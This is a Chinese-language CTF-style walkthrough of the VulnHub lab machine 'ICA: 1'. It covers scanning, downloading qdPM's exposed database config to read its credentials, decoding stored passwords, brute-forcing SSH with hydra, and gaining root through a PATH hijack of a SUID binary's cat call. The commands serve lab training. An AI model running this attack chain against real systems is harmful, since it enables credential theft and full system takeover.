vunlnhub靶机之 ICA：1

	简介 靶机下载地址：ICA： 1 ~ VulnHub 靶机简介：根据我们情报网的信息，ICA正在进行一个秘密项目。我们需要找出该项目是什么。一旦你得到访问信息 就把它们发给我们。我们稍后会放置一个后门来访问该系统。你只需专注于该项目是什么。你可能要通过几层安全保 障中情局完全相信你会成功完成这项任务。好运，特工! 难度： 简单 探测IP，扫描端口 netdiscover -r 192.168.81.0/24 nmap -A 192.168.81.150 开启了80、22、3306，先来查看一下网页 探测80端口信息 查看页面 为一个登录页面，看到qdPM9.2。 不了解该软件系统，百度搜索 https://codingdict.com/os/software/63511得知这是一个开源项目管理系统。 探测该软件系统漏洞 searchsploit qdPM  9.2          发现有该版本存在漏洞：密码暴露 查看漏洞利用 cat /usr/share/exploitdb/exploits/php/webapps/50176.txt 翻译一下：数据库的密码和连接字符串存储在一个 yml 文件中。要访问该yml文件你可以 到http://<website>/core/config/databases.yml文件并下载。 访问页面获取到了数据库账号密码（因为是纯字母，所以不需要url解码） qdpmadmin：UcVQCMQk2STVeS6J 登录数据库 mysql -h 192.168.81.150 -u qdpmadmin -p    探索有用的信息 在qdpm的配置文件中找到了管理员的账号和密码 但是无法破解密码。 终于在staff数据库下的user表和login表发现信息。 其中login的password有对应的user_id 我们整理一下，并用base64解码 Smith ：WDdNUWtQM1cyOWZld0hkQw     //解码为X7MQkP3W29fewHdC Lucas： c3VSSkFkR3dMcDhkeTNyRg   //解码为suRJAdGwLp8dy3rF Travis：REpjZVZ5OThXMjhZN3dMZw   //解码为DJceVy98W28Y7wLg Dexter：N1p3VjRxdGc0MmNtVVhHWA   //解码为7ZwV4qtg42cmUXGX Meyer：Y3FObkJXQ0J5UzJEdUpTeQ   //解码为cqNnBWCByS2DuJSy 爆破一下密码 hydra -L user.txt -P passwd.txt ssh://192.168.81.150 -t 4 -vV 由于大写得不到密码，我尝试修改为了小写，爆破成功 登录ssh，搜集信息 登录travis ssh travis@192.168.81.150//登录travis 得到一条flag 查看一下有suid的指令和sudo的权限 /usr/bin$ find / -perm -u=s -type f 2>/dev/null 查看一下sudo权限 sudo -l 都没有可利用的点。 切换用户dexter ssh dexter@192.168.81.150 //登录Dexter 得到一条提示：翻译一下---->在我看来，在访问系统时有一个弱点。 据我所知，可执行文件的内容是可以部分查看的。 我需要弄清楚是否存在漏洞。           //没搞懂 同样查看一下suid的命令 发现get_access比较可疑，经查看是一个有s位的可执行文件，验证了刚才note.txt里的话 note提示说可执行文件的内容是可以部分查看的，我们查看一下 cat get_acces   发现全是乱码，我们用string查看一下，发现有一个cat查看了root的系统信息 这里的漏洞是，由于程序没有使用绝对路径进行调用cat，我们可以制作一个恶意的cat文件 运行get_access市调用它。 提权 echo '/bin/bash' > /tmp/cat chmod +x /tmp/cat export PATH=/tmp:$PATH ./get_access 这样一来，系统会首先调用path靠前的命令，就会调用到我们制作的”恶意cat“ 现在我们切换到了root用户（因为市以root权限执行的/bin/bash，所以就会直接切换到root的shell） 由于我们把cat文件的执行命令路径替换到了，所以用more来查看第二天flag 完成：获得了两条flag 补充 关于/bin/bash：这是一个开启shell的命令，以谁的权限执行就会登陆到谁的shell。